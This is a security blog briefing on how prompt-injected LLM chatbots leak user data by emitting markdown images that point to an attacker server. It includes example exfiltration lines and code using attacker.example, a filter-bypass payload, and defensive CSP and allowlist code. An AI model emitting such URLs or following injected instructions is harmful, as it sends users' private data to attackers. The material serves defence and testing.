How LLM Chatbots Leak Data Through Their Own Rendered Output
A recurring AI-security finding: an injected instruction makes the model emit a markdown image whose URL carries the user's data to an attacker server. Why this works, why CSP is the real fix, and what to check this week.
One vulnerability class keeps reappearing in AI-security write-ups under slightly different names, across many different chatbot products: data exfiltration through the model’s own rendered output. It is worth a standalone briefing because the root cause is almost never the model — it is the rendering layer the product team built around the model, and the fix is a web-security control most LLM teams have not applied to the chat surface.
The attack, end to end
The setup requires two ingredients that modern assistants routinely provide: the model can be influenced by untrusted content (via indirect prompt injection — a web page, a document, an email it processes), and the UI renders the model’s markdown, including images.
The chain:
- A user asks the assistant to summarize an attacker-controlled document or web page.
- Hidden text in that content instructs the model: take the user’s earlier messages (or retrieved private context) and append them, URL-encoded, to an image link pointing at an attacker server.
- The model, following the injected instruction, emits a markdown inline image whose URL is https://attacker.example/log?d=<the user's data, url-encoded>.
- The chat UI renders the markdown. To display the “image,” the browser issues a GET request to the attacker’s server. The data is now in the attacker’s logs. No click is required; rendering is the trigger.
The user sees, at most, a broken image icon. The exfiltration already happened.
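A minimal sketch of the exfiltration step shows how little the attacker needs. The injected instruction only has to get the model to place encoded data in a query string, and reading it back out of an access log is one standard-library call. The host, path, and d parameter mirror the example URL above; the function names and the sample secret are hypothetical.

```python
from urllib.parse import parse_qs, quote, urlsplit

def exfil_image_markdown(stolen: str) -> str:
    """Hypothetical: the markdown an injected instruction asks the model to emit."""
    # quote(..., safe="") percent-encodes reserved characters such as / & = : and spaces
    return f"![](https://attacker.example/log?d={quote(stolen, safe='')})"

def what_the_attacker_logs(request_url: str) -> str:
    """The attacker's server only needs to decode the query string of the GET it receives."""
    return parse_qs(urlsplit(request_url).query)["d"][0]

secret = "api_key=sk-test-123 & launch date: May 2"
markdown = exfil_image_markdown(secret)
image_url = markdown[len("![]("):-1]  # the URL the browser requests to render the image

print(markdown)
print(what_the_attacker_logs(image_url) == secret)  # True
```

The ampersand, equals sign, and spaces in the secret survive the trip because they are percent-encoded; nothing beyond the browser's ordinary image fetch is involved.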
Why this keeps shipping
It recurs because the model and the UI are usually built by people reasoning about different threats. The model team is focused on what the model says. The UI team renders markdown because it makes responses look good. Neither owns the question “what happens when the model is induced to emit an attacker-chosen URL and our renderer dutifully fetches it.” The vulnerability lives in the seam between them, which is exactly the seam nobody is assigned to defend.
Output filtering at the model layer helps but is not sufficient — it is the same losing game as filtering injection on the input side. A determined payload will find an emission the filter does not catch.
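A small illustration of that losing game, assuming a hypothetical filter that deletes inline markdown images pointing off-site. CommonMark also defines reference-style images, where the URL sits in a separate link reference definition, so a spec-following renderer still fetches the second payload even though the filter let it through.

```python
import re

# Hypothetical naive output filter: removes inline images of the form ![alt](http...)
INLINE_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*https?://[^)]*\)")

def naive_filter(model_output: str) -> str:
    return INLINE_IMAGE.sub("", model_output)

inline = "Summary done. ![](https://attacker.example/log?d=secret)"
reference = "Summary done. ![logo][1]\n\n[1]: https://attacker.example/log?d=secret"

print(naive_filter(inline))     # image removed
print(naive_filter(reference))  # unchanged: the URL lives in a reference definition
```

Raw HTML img tags, in renderers that pass HTML through, are another route this filter would miss.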
The real fix is a browser control, not a model control
The durable mitigation is to deny the rendering layer the ability to make arbitrary outbound requests on the model’s behalf:
- Content Security Policy. A restrictive img-src (and connect-src, frame-src, style-src) that allows only your own asset origins means an attacker-chosen image URL simply does not load: the browser refuses the request. This converts a working exfiltration channel into an inert broken-image icon. It is the highest-leverage control, and most chat UIs ship without it.
- URL allowlisting in the renderer. Before rendering model output, rewrite or strip image and link targets that are not on an allowlist. This is defense in depth behind CSP, and most useful where CSP is hard to scope tightly.
- Don’t auto-load remote media in chat at all. Many assistants have no legitimate need to inline arbitrary remote images from model output. Click-to-load, or no remote media, removes the channel entirely.
- Treat model output as untrusted before it touches the DOM. The same principle as tool calls: anything the model emits that becomes a network request must clear a non-model check first.
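The renderer-side allowlist reduces to one check that every image and link target must pass before it reaches the DOM. This is a minimal sketch, assuming your markdown library lets you intercept URLs during rendering; the hook's name and shape vary by library, so rewrite_image_src is hypothetical, as are ALLOWED_ORIGINS and the assets.example.com host. It compares parsed origins rather than string prefixes, and refuses inputs where Python's URL parser and the browser's could disagree about the host.

```python
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical allowlist of (scheme, host, port) origins the chat UI may load from.
ALLOWED_ORIGINS = {("https", "assets.example.com", 443)}
DEFAULT_PORTS = {"https": 443, "http": 80}

def is_allowed_url(url: str) -> bool:
    """Return True only if url points at an allowlisted origin."""
    url = url.strip()
    # Backslashes and embedded whitespace/control characters are handled differently
    # by Python's parser and by browsers (WHATWG URL parsing), so reject them outright:
    # a browser reads "https://attacker.example\@assets.example.com/" as attacker.example.
    if "\\" in url or any(c.isspace() or ord(c) < 0x20 for c in url):
        return False
    try:
        parts = urlsplit(url)
        port = parts.port or DEFAULT_PORTS.get(parts.scheme)
    except ValueError:  # malformed host, or non-numeric / out-of-range port
        return False
    # Relative, plain-http, data: and javascript: URLs all fail this check.
    if parts.scheme != "https" or parts.hostname is None:
        return False
    # hostname is the real host even with userinfo tricks such as
    # "https://assets.example.com@attacker.example/" (hostname == "attacker.example").
    return (parts.scheme, parts.hostname, port) in ALLOWED_ORIGINS

def rewrite_image_src(url: str) -> Optional[str]:
    """Assumed renderer hook: return the URL to render, or None to drop the image."""
    return url if is_allowed_url(url) else None

print(rewrite_image_src("https://assets.example.com/logo.png"))
print(rewrite_image_src("https://attacker.example/log?d=secret"))  # None
```

Apply the same check to link targets. Relative URLs are rejected here for simplicity; resolve them against your own origin first if the UI needs them. Keep CSP in place regardless: if this function has a bug, CSP is what turns that bug into a broken image instead of a leak.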
What to check this week
- Open your assistant’s chat UI and inspect the Content-Security-Policy response header. If img-src (or default-src, which applies when img-src is absent) allows *, or there is no policy at all, you have the channel.
- Trace what your renderer does with model-emitted markdown images and links. If it renders them with no allowlist, the browser will fetch them, and that is the finding.
- Add a deliberate test to your red-team set: an injected instruction that asks the model to encode prior context into an image URL. If the request reaches your test server, the vulnerability is live.
- Prioritize CSP over output filtering. Filtering is an arms race; a tight img-src is a wall.
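The first check on that list can be scripted. This is a minimal sketch that parses a single Content-Security-Policy header value and reports whether images can load from arbitrary hosts. It applies the CSP rule that a missing img-src falls back to default-src, and treats a bare *, a bare scheme source such as https:, or a scheme with a wildcard host as open. It does not handle multiple policies, policies delivered via a meta tag, or every wildcard form, so a clean result is a prompt for manual review rather than proof; the function names are hypothetical.

```python
from typing import Optional

# Source expressions that let an image load from (almost) any host.
OPEN_SOURCES = {"*", "http:", "https:", "http://*", "https://*"}

def parse_csp(header: str) -> dict[str, list[str]]:
    """Split one CSP policy into {directive: [sources]}; the first duplicate wins."""
    directives: dict[str, list[str]] = {}
    for chunk in header.split(";"):
        tokens = chunk.split()
        if tokens:
            # Directive names are case-insensitive; later duplicates are ignored.
            directives.setdefault(tokens[0].lower(), tokens[1:])
    return directives

def img_src_is_open(header: Optional[str]) -> bool:
    """True if this policy (or its absence) lets images load from arbitrary hosts."""
    if not header or not header.strip():
        return True  # no policy at all: nothing restricts image loads
    directives = parse_csp(header)
    # img-src falls back to default-src when it is not set.
    sources = directives.get("img-src", directives.get("default-src"))
    if sources is None:
        return True  # neither directive present: images are unrestricted
    # An empty source list behaves like 'none', so any([]) == False is correct.
    return any(src.lower() in OPEN_SOURCES for src in sources)

print(img_src_is_open("default-src 'self'; img-src *"))             # True
print(img_src_is_open("default-src 'self'; img-src 'self' data:"))  # False
```

Feed it the header value copied from the browser's network panel for the chat page.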
The summary that holds across every product this has hit: the model emitting a bad URL is not preventable, but the browser fetching it is. Fix the rendering layer, not just the prompt.
— Theo